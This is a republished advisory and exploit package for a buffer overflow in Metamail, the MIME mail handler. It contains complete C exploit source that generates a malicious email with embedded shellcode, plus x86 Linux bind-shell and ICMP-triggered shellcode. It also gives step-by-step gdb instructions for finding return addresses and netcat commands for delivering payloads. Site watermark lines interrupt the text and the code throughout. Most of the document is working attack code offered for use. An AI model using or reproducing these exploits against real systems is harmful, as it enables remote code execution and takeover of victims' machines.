Summary
"Metamail is an implementation of MIME, the Multipurpose Internet Mail Extensions, a proposed standard for multimedia mail on the Internet. Metamail implements MIME, and also implements extensibility and configuration via the "mailcap" mechanism described in an informational RFC that is a companion to the MIME document".
Several vulnerabilities have been found in the product that would allow a remote attacker to cause the program to fail or execute arbitrary code (due to format string and buffer overflow vulnerabilities). One of these vulnerabilities can be tested by the below provided exploit.
Details
How to use this exploit?
This exploit exploits the Metamail buffer overflow vulnerability. Thanks to Ulf Harnhammer for the proof of concept exploit. Compile it with:
- gcc metaexpl.c -o metaexpl
And launch it with
- ./metaexpl align retaddr
The output is a specially crafted mail. Pipe it to a file and launch Metamail.
中国网管论坛bbs.bitsCN.com
Example:
- ./metaexpl 0 0x8054050 > mail
- metamail mail
If you have the correct align and return address. You should have an open UDP port at 13330. Search for it with:
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State
- udp00 *:13330 *:*
Now you can send your shellcode to port 13330, priest added two shellcodes to my exploit. One is a port bind TCP port 65535 code and the other code use ICMP and the ping utility to launch code. You can send it with:
- cat bindsockshc | netcat -u yourip 13330
Or
- cat icmpshc | netcat -u yourip 13330
Now telnet to IP address and port 65535 if, you use bind shellcode:
- telnet ipaddr 65535
- Trying ::1...
- telnet: connect to address ::1: Connection refused
- Trying 127.0.0.1...
- Connected to localhost.
- Escape character is '^]'.
网管联盟bitsCN_com - id;
- uid=100(hack) gid=100(users) groups=100(users)
- : command not found
For ICMP shellcode look at icmp.c file in this package.
How can i find the correct offset for other Linux distributions?
Align 0 and Return address 0x8054050 works for German SUSE Linux 7.0. The target is in the file "targets" in this package. Please send me the targets of your Linux distributions. If you want to exploit another distribution, you need another align and return address. Launch exploit with align 0 and any return address.
- ./metaexpl 1 0x41424344 > /tmp/mail
Now open gdb with Metamail executable and launch it with mail
- gdb metamail
- (gdb)
- (gdb) r mail
- Starting program: /usr/bin/metamail mail
- Program received signal SIGSEGV, Segmentation fault.
- 0x68726979 in ?? ()
You have the wrong offset. Switch to another terminal and create a new mail with another offset. Positive and negative values are allowed.
网管联盟bitsCN_com
- ./metaexpl 2 0x41424344 > /tmp/mail
Now in gdb:
- (gdb) r mail
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /usr/bin/metamail mail
- Program received signal SIGSEGV, Segmentation fault.
- 0x61626364 in ?? ()
- (gdb)
Now we have the correct offset (ABCD is normally \x41\x42\x43\x44 in hex, but Metamail adds 0x20 to it). Let's search for the return address (the return address is located at heap):
- maintenance info sections
- ...
- 0x08053080->0x08053450 at 0x0000a080: .data ALLOC LOAD DATA HAS_CONTENTS
- 0x08053450->0x08053454 at 0x0000a450: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
- 0x08053454->0x0805345c at 0x0000a454: .ctors ALLOC LOAD DATA HAS_CONTENTS
- 0x0805345c->0x08053464 at 0x0000a45c: .dtors ALLOC LOAD DATA HAS_CONTENTS
- 0x08053464->0x08053558 at 0x0000a464: .got ALLOC LOAD DATA HAS_CONTENTS
- 0x08053558->0x080535f8 at 0x0000a558: .dynamic ALLOC LOAD DATA HAS_CONTENTS
网管论坛bbs_bitsCN_com
- 0x08053600->0x08053e50 at 0x0000a600: .bss ALLOC
- 0x00000000->0x0000017c at 0x0000a600: .comment READONLY HAS_CONTENTS
- 0x08053e50->0x08053f18 at 0x0000a77c: .note READONLY HAS_CONTENTS
- ^^^^^^^^^^
Now search for the NOPs (The heap is after 0x08053f18):
- (gdb) x/1000x 0x08053f18
- 0x8053f18:0x08053f680xffffffff0xffffffff0x00000000
- 0x8053f28:0x000000000x000000000x000000000x00000000
- 0x8053f38:0x000000000x000000000x000000000x00000000
- 0x8053f48:0x000000000x000000000x000000000x00000000
- 0x8053f58:0x000000000x000000000x000000000x400f5d80
- 0x8053f68:0x000000000x000000000x000000000x00000000
- 0x8053f78:0x000000000x000000000x000000000x000003f1
- 0x8053f88:0x485f4d4d0x454441450x0a3d53520x6d6f7246
- 0x8053f98:0x3f3d203a0x474747470x474747470x47474747
网管u家u.bitsCN.com
- 0x8053fa8:0x474747470x474747470x474747470x47474747
- 0x8053fb8:0x474747470x474747470x474747470x47474747
- 0x8053fc8:0x474747470x474747470x474747470x47474747
- 0x8053fd8:0x474747470x474747470x474747470x47474747
- 0x8053fe8:0x474747470x474747470x474747470x47474747
- 0x8053ff8:0x474747470x474747470x474747470x47474747
- 0x8054008:0x474747470x474747470x474747470x47474747
- 0x8054018:0x474747470x474747470x474747470x47474747
- 0x8054028:0x474747470x474747470x474747470x47474747
- ...
0x47474747 are the NOPs. All addresses with 0x47474747 are valid return addressees. Take an address in the middle of the NOP buffer. 0x8053fc8 is a good one for example. Ok, we have our values. We can exploit it:
- metaexpl 2 0x8053fc8 > /tmp/mail
- metamail /tmp/mail
网管网www.bitscn.com - netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State
- udp00 *:13330 *:*
Exploit:
#include <stdio.h>
// Standard buffer size for vuln buffer
#define STDBUFSIZ560
// Udp Port 13330 for shellcode
#define PORT"\x34\x12"
#define NOP 'G'
// Shellcode, which wait for another shellcode on udp port PORT and
// launch it. Special thanks to:
//** gunzip@ircnet <techieone@softhome.net>
//** http://members.xoom.it/gunzip
// for his wunderful shellcode.
char shellcode[]=
"\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
"\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
网管联盟bitsCN@com "\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";
// Generate random nop data.
int gen_nops(char *buffer, int size)
{
int i, num;
FILE *file;
// Open urandom for srandom
file = fopen("/dev/urandom", "r");
// Iterate size times
for(i=0;i<size;i++)
{
// Read random data for srandom
num = fgetc(file);
// Set random number seed
srandom(num);
// Get random value
num = random() % 26;
// Add num to random value, to print always upper chars.
buffer[i] = 65 + num;
}
// close urandom
fclose(file);
return 0;
}
中国网管联盟bitsCN.com
// Usage for wrong command line parameters
void usage(char *argv)
{
printf("\n%s align retaddr\n", argv);
}
// Start of the exploit
int main(int argc, char **argv)
{
char *buf;
char *p;
long *retaddr;
int align;
int i;
if(argc != 3)
{
usage(argv[0]);
exit(-1);
}
// Align and return address
align = atoi(argv[1]);
retaddr = strtoul(argv[2], 0, 0);
// Get memory for our vuln buffer
buf = (char*) malloc(STDBUFSIZ+align+1);
// Pointer to buf
p = buf;
// Set random nops (My last project. Use my function if you want,
// to evade Intrusion detection systems). If you want the whitepaper
// to the code, go to http://www.priestmaster.org/mypapers/nops.tgz
// gen_nops(buf, STDBUFSIZ+align+1);
memset(buf, NOP, STDBUFSIZ+align+1);
中国网管论坛bbs.bitsCN.com
// Copy the shellcode into the buffer
memcpy(p+STDBUFSIZ-4-strlen(shellcode), shellcode, strlen(shellcode));
// Set return address
p += STDBUFSIZ+align-4;
*((void **)p) = (void *) retaddr;
// Null terminate
buf[STDBUFSIZ+align+1] = 0;
// Generate vuln mail
// Change this to your values if you want.
printf("From: =?");
printf("%s?Q?test_?= <metaur@localhost>\n", buf);
printf("To: <metaur@localhost>\n");
printf("Subject: Testmail 3: Message for you\n");
printf("MIME-Version: 1.0\n");
printf("Content-Type: text/whatever\n\n");
printf("Testmail 3");
}
bindsockshc.c:
/*Copyright (c) Ramon de Carvalho ValleJuly 2003*/
/*x86/linux bindsocketshellcode */
网管联盟bitsCN@com
char shellcode[]= /*72 bytes*/
"\x31\xdb"/*xorl%ebx,%ebx */
"\xf7\xe3"/*mull%ebx*/
"\x53"/*pushl %ebx*/
"\x43"/*incl%ebx*/
"\x53"/*pushl %ebx*/
"\x6a\x02"/*pushl $0x02 */
"\x89\xe1"/*movl%esp,%ecx */
"\xb0\x66"/*movb$0x66,%al */
"\xcd\x80"/*int $0x80 */
"\xff\x49\x02"/*decl0x02(%ecx)*/
"\x6a\x10"/*pushl $0x10 */
网管联盟bitsCN_com "\x51"/*pushl %ecx*/
"\x50"/*pushl %eax*/
"\x89\xe1"/*movl%esp,%ecx */
"\x43"/*incl%ebx*/
"\xb0\x66"/*movb$0x66,%al */
"\xcd\x80"/*int $0x80 */
"\x89\x41\x04"/*movl%eax,0x04(%ecx) */
"\xb3\x04"/*movb$0x04,%bl */
"\xb0\x66"/*movb$0x66,%al */
"\xcd\x80"/*int $0x80 */
"\x43"/*incl%ebx*/
"\xb0\x66"/*movb$0x66,%al */
网管联盟bitsCN_com "\xcd\x80"/*int $0x80 */
"\x59"/*popl%ecx*/
"\x93"/*xchgl %eax,%ebx */
"\xb0\x3f"/*movb$0x3f,%al */
"\xcd\x80"/*int $0x80 */
"\x49"/*decl%ecx*/
"\x79\xf9"/*jns <bindsocketshellcode+45>*/
"\x68\x2f\x2f\x73\x68"/*pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e"/*pushl $0x6e69622f */
"\x89\xe3"/*movl%esp,%ebx */
"\x50"/*pushl %eax*/
"\x53"/*pushl %ebx*/
网管联盟bitsCN@com
"\x89\xe1"/*movl%esp,%ecx */
"\xb0\x0b"/*movb$0x0b,%al */
"\xcd\x80"/*int $0x80 */
;
main()
{
void (*dsr) ();
(long) dsr = &shellcode;
printf("Size: %d bytes.\n", sizeof(shellcode));
dsr();
}
icmpshc.c:
/*
x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
[example]
main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137
main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
中国网管论坛bbs.bitsCN.com
uid=0(root) gid=0(root) groups=0(root)
main:/home/gloomy/security/shellcode/linux/icmp#
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SECRET_CHAR "\x99"
char shell[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
"\x43\x41\x51\xb1\x03\x51\x49\x51"
"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
"\xcd\x80\x31\xdb\x39\xc3\x75\x55"
"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
"\xff\x54\x54\x53\x50\x55\x52\x89"
"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
"\xb0\x25\x01\xc5\xb0" SECRET_CHAR
"\x32\x45\xff\x75\xd5\xb0\x02\xcd"
"\x80\x31\xdb\x39\xc3\x74\x25\xeb"
"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
"\x06\xcd\x80\x5b\x89\xd9\x88\x43"
网管u家u.bitscn@com
"\x07\x80\xc1\x08\x50\x55\x51\x53"
"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
"\xff"
"/bin/sh -c";
void asm_code() {
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int$0x80/* socket(); */
movl %eax,%edx
movb $0x2,%al
int$0x80/* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jneexit
endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
中国网管联盟bitsCN.com
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int$0x80/* recvfrom(); */
movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al/* SECRET_CHAR */
xorb -1(%ebp),%al
jnzendlessloop
movb $0x2,%al
int$0x80/* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmpendlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int$0x80/* close(); */
pop%ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
网管联盟bitsCN_com movb $0xb,%al
int$0x80/* execve(); */
exit:
xorl %eax,%eax
incl %eax
int$0x80/* exit(); */
stack:
call execve
.string \"/bin/sh -c\"
");
}
void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = ;
fd = socket(2,3,1);
if (fork() > 0) exit(0);
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
buf[nb-1] = 0;
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
}
}
int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell;
fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
网管u家u.bitscn@com i();
return 0;
}
评论加载中…
